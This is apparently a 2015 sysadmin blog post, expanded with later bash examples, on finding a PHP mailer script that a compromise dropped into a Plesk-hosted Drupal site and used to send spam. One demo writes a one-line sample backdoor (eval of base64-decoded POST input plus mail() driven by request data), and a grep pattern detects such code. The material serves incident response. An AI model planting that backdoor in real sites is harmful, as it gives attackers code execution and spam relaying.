Monthly Archives: January 2015

Parallels Plesk Postfix Mail Queue Spam Issue

Over the weekend I noticed an abnormal amount of SMTP traffic coming from one of the domains I host. In Parallels Plesk the Postfix mail queue showed upwards of 65,000 messages stuck in the queue. This was especially alarming because the domain does not have any mailboxes at all. Based on the domain traffic activity report within Plesk it was clear that the messages were originating from domain.com.

I spent some time searching the internet and found a few very valuable pieces of information:

I should also mention that Plesk 12 has a new feature (outgoing mail control) which allows you to set limits on outgoing mail. The first step I took was to restrict mail flow for domain.com. You can control mail flow at the following levels from within the Plesk Control Panel: default per mailbox, default per domain, default per subscription.

Here are the steps I took to resolve the Postfix Spam problem:

Step 1) I set the outgoing mail limit to 0 for the domain in question. I then ran some of the built-in Plesk tools such as the Watchdog security scan. Watchdog threw a couple of warnings, but there weren't any issues beyond the normal alerts (SSH enabled, root access, etc.).

Step 2) PHP 5.3.0 added two ini directives, mail.log and mail.add_x_header, which record every call to mail() together with the full path and line number of the script that made it. To use mail.log you first have to create a file for PHP to write to:

  • Create log file
    touch /var/log/php-mail.log
    
  • Change permissions of log file
    chmod 777 /var/log/php-mail.log
    
    (777 is more than PHP needs: the file only has to be writable by the user the domain's PHP handler runs as, i.e. apache for mod_php or the subscription's system user for FastCGI/PHP-FPM on Plesk, and the execute bit does nothing for a log file. Bear in mind that a malicious script running as that same user can also truncate the log.)
    

Step 3) Once you have created the log file and set its permissions, log into Parallels Plesk and modify the PHP settings for the domain in question (both directives are PHP_INI_PERDIR, so they can be set per domain rather than server-wide):

  • Modify PHP settings for suspect domain
    • Added the following entries (the path must be the same file created in Step 2)
      mail.add_x_header = On
      mail.log = /var/log/php-mail.log
      

Parallels Plesk PHP parameters (domain specific)

Step 4) After a short period of time (less than a minute) the log file began to fill with data:

mail() on [/var/www/vhosts/domain.com/httpdocs/drupal_dev/modules/taxonomy/ini.php:1]: To: [email protected] -- Headers: From: "Molly Weiss" <[email protected]>  Reply-To:"Molly Weiss" <[email protected]>  X-Priority: 3 (Normal)  MIME-Version: 1.0  Content-Type: text/html; charset="iso-8859-1"  Content-Transfer-Encoding: 8bit
mail() on [/var/www/vhosts/domain.com/httpdocs/drupal_dev/modules/taxonomy/ini.php:1]: To: [email protected] -- Headers: From: "Molly Weiss" <[email protected]>  Reply-To:"Molly Weiss" <[email protected]>  X-Priority: 3 (Normal)  MIME-Version: 1.0  Content-Type: text/html; charset="iso-8859-1"  Content-Transfer-Encoding: 8bit
mail() on [/var/www/vhosts/domain.com/httpdocs/drupal_dev/modules/taxonomy/ini.php:1]: To: [email protected] -- Headers: From: "Molly Weiss" <[email protected]>  Reply-To:"Molly Weiss" <[email protected]>  X-Priority: 3 (Normal)  MIME-Version: 1.0  Content-Type: text/html; charset="iso-8859-1"  Content-Transfer-Encoding: 8bit
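The Step 2 and Step 3 setup, and a quick way to summarise the resulting log by originating script, as an added example that is not code from the original post. The log path, the owner argument and the sample log lines are assumptions constructed for the demo; the format of the lines follows what PHP's mail() writes.

```bash
#!/bin/bash
# Added example, not code from the original post: the Step 2/3 setup with
# tighter permissions, plus a summary of the resulting mail.log so the
# originating script stands out.  The log path, the owner argument and the
# sample log lines are assumptions constructed for this demo.

# Must be the same path that mail.log is set to in the domain's PHP settings.
PHP_MAIL_LOG="${PHP_MAIL_LOG:-/var/log/php-mail.log}"

# Step 2 without chmod 777: the file only needs to be writable by the user the
# domain's PHP handler runs as (apache for mod_php, the subscription's system
# user for FastCGI/PHP-FPM on Plesk).  Requires root; not run by the demo.
setup_php_mail_log() {
    local log="$1" php_user="$2"
    touch "$log" && chown "$php_user" "$log" && chmod 0600 "$log"
}

# Step 3 lines to paste into the domain's PHP settings in Plesk
# (the directive is mail.add_x_header, not add_x_header).
php_mail_directives() {
    printf 'mail.add_x_header = On\nmail.log = %s\n' "$1"
}

# PHP writes one line per mail() call:
#   mail() on [/path/script.php:LINE]: To: addr -- Headers: From: ...
# (CR/LF inside the headers are turned into spaces; PHP 7+ also prefixes a
# timestamp and appends "-- Subject: ...").  Count calls per script and From:.
summarise_php_mail_log() {
    awk '
        match($0, /mail\(\) on \[[^]]+\]/) {
            script = substr($0, RSTART + 11, RLENGTH - 12)   # drop "mail() on [" and "]"
            sender = "(no From: header)"
            if (match($0, /From: [^<]*<[^>]*>/)) {
                sender = substr($0, RSTART + 6, RLENGTH - 6)   # drop "From: "
            }
            count[script "\t" sender]++
        }
        END { for (k in count) printf "%d\t%s\n", count[k], k }
    ' "$1" | sort -rn
}

# Constructed sample in the PHP 5.3 format shown in the post, plus one
# PHP 7 style line from a legitimate contact form.
write_sample_log() {
    cat > "$1" <<'EOF'
mail() on [/var/www/vhosts/domain.com/httpdocs/drupal_dev/modules/taxonomy/ini.php:1]: To: victim1@example.net -- Headers: From: "Molly Weiss" <molly@example.org>  Reply-To:"Molly Weiss" <molly@example.org>  X-Priority: 3 (Normal)  MIME-Version: 1.0
mail() on [/var/www/vhosts/domain.com/httpdocs/drupal_dev/modules/taxonomy/ini.php:1]: To: victim2@example.net -- Headers: From: "Molly Weiss" <molly@example.org>  Reply-To:"Molly Weiss" <molly@example.org>  X-Priority: 3 (Normal)  MIME-Version: 1.0
mail() on [/var/www/vhosts/domain.com/httpdocs/drupal_dev/modules/taxonomy/ini.php:1]: To: victim3@example.net -- Headers: From: "Molly Weiss" <molly@example.org>  Reply-To:"Molly Weiss" <molly@example.org>  X-Priority: 3 (Normal)  MIME-Version: 1.0
[04-Jan-2015 09:12:41 UTC] mail() on [/var/www/vhosts/domain.com/httpdocs/sites/all/modules/webform/webform.module:1180]: To: owner@domain.com -- Headers: From: "Site" <noreply@domain.com>  MIME-Version: 1.0 -- Subject: Contact form
EOF
}

# Stand-alone demo on the constructed sample: ./script.sh --demo
if [ "${1:-}" = "--demo" ]; then
    tmp=$(mktemp) && write_sample_log "$tmp" && summarise_php_mail_log "$tmp"
    rm -f "$tmp"
fi
```

The summary puts the busiest script:line at the top, which is usually the dropped mailer, while a legitimate form sending a handful of messages sits at the bottom. Current PHP releases also accept mail.log = syslog, which keeps the record out of a file the web user can truncate.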

Based on the data I was able to identify the following file: /var/www/vhosts/domain.com/httpdocs/drupal_dev/modules/taxonomy/ini.php. This file was embedded within the suspect domain's website directory. I am not totally sure how it got there, but my guess is through an exploit in Drupal or an incorrect permission while I was developing a new website in Drupal. A file named ini.php dropped into a core module directory, with all of its code on line 1, is typical of a PHP mailer script uploaded through a compromised application; the domain's Apache access log (under the vhost's logs/ directory in Plesk) can show the requests that invoked it and, with luck, the request that created it.

I moved the file to a different directory, changed its permissions and downloaded it from the server for further investigation. Since the removal of this file there have been no further issues with the domain sending spam. Removing the mailer stops the symptom, however: whatever let it be written is still there, and attackers rarely drop only one file, so the rest of the web root should be checked (diffing against a pristine copy of the same Drupal release is the most reliable way).
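Two checks for further dropped files in the same vhost, as an added example that is not code from the original post. The web root, the grep patterns and the sample tree are constructed for this demo; run the two find_* functions against the real /var/www/vhosts/&lt;domain&gt;/httpdocs instead.

```bash
#!/bin/bash
# Added example, not code from the original post: after one mailer script has
# been found, look for other dropped PHP files in the same vhost.  The web root
# and the sample tree below are constructed for this demo.

# PHP files containing constructs typical of uploaded mailers/backdoors:
# eval() over decoded/obfuscated input, or mail() fed straight from request data.
find_suspicious_php() {
    local root="$1"
    find "$root" -type f \( -name '*.php' -o -name '*.phtml' \) \
        -exec grep -lE 'eval *\( *(base64_decode|gzinflate|gzuncompress|str_rot13)|mail *\( *\$_(POST|GET|REQUEST)' {} + 2>/dev/null \
        | sort
}

# PHP files modified in the last N days (default 7): a dropped file is usually
# far newer than the CMS release around it.  An attacker can reset mtime, so
# treat an empty result as "nothing obvious", not "clean".
find_recent_php() {
    local root="$1" days="${2:-7}"
    find "$root" -type f -name '*.php' -mtime -"$days" | sort
}

# Constructed Drupal-like tree: one ordinary module file and one mailer dropped
# into a core module directory, as in the post.  The "mailer" is plain text
# written with printf; nothing here is executed.
make_sample_vhost() {
    local root="$1"
    mkdir -p "$root/httpdocs/drupal_dev/modules/taxonomy" \
             "$root/httpdocs/sites/all/modules/custom"
    printf '<?php\nfunction custom_page() { return t("Hello"); }\n' \
        > "$root/httpdocs/sites/all/modules/custom/custom.php"
    printf '<?php @eval(base64_decode($_POST["c"])); @mail($_POST["to"], $_POST["s"], $_POST["b"], $_POST["h"]);\n' \
        > "$root/httpdocs/drupal_dev/modules/taxonomy/ini.php"
}

# Stand-alone demo on the constructed tree: ./script.sh --demo
if [ "${1:-}" = "--demo" ]; then
    root=$(mktemp -d) && make_sample_vhost "$root"
    echo "suspicious:"; find_suspicious_php "$root"
    echo "recent:";     find_recent_php "$root" 7
    rm -rf "$root"
fi
```

The pattern list is deliberately short and will miss anything that hides behind string concatenation or variable functions; it is a first pass to find the obvious siblings of the file already identified, not a substitute for comparing the tree against a clean Drupal checkout.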

Due to this issue I have changed all passwords. Depending on what I find I may even look at an entire rebuild however I don’t believe it is required.

If you have had any similar issues please share, or if you think I missed something please let me know.